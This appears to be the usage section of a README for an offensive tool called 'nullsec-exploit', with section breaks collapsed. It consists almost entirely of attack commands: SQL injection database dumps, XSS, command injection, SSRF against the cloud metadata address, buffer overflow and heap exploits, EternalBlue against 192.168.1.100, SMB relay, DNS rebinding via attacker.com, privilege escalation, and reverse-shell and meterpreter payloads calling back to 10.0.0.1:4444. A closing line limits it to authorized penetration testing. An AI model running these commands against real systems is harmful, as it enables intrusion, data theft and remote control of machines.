# Detect SQLi
nullsec-exploit --sqli --detect --url "https://target.com/search?q="
# Extract database
nullsec-exploit --sqli --dump --url "https://target.com/search?q=" --dbs
# Blind SQLi
nullsec-exploit --sqli --blind --url "https://target.com/search?q=" --technique time# Reflected XSS scan
nullsec-exploit --xss --scan --url https://target.com --crawl
# Stored XSS detection
nullsec-exploit --xss --stored --url https://target.com/comment
# DOM-based XSS
nullsec-exploit --xss --dom --url https://target.comnullsec-exploit --cmdi --url "https://target.com/ping?host=" --payloads cmdi.txtnullsec-exploit --ssrf --url "https://target.com/fetch?url=" --target http://169.254.169.254/# Pattern generation
nullsec-exploit --bof --pattern --length 1000
# Offset calculation
nullsec-exploit --bof --offset --pattern "Aa0A"
# ROP chain generation
nullsec-exploit --bof --rop --binary vuln.exe --target win10nullsec-exploit --format --target vuln --offset 6 --write 0x08048500nullsec-exploit --heap --technique uaf --binary vuln --libc libc.so.6# EternalBlue (MS17-010)
nullsec-exploit --smb --ms17-010 --target 192.168.1.100
# SMB relay
nullsec-exploit --smb --relay --target 192.168.1.100# DNS rebinding
nullsec-exploit --dns --rebind --domain attacker.com --target 192.168.1.100# Enumerate privesc vectors
nullsec-exploit --privesc --os linux --enumerate
# Exploit suggestions
nullsec-exploit --privesc --os linux --suggest# Enumerate privesc vectors
nullsec-exploit --privesc --os windows --enumerate
# Token manipulation
nullsec-exploit --privesc --os windows --token# Reverse shell
nullsec-exploit --payload --type reverse --host 10.0.0.1 --port 4444 --format python
# Bind shell
nullsec-exploit --payload --type bind --port 4444 --format c
# Meterpreter
nullsec-exploit --payload --type meterpreter --host 10.0.0.1 --port 4444 --format exeFor authorized penetration testing only.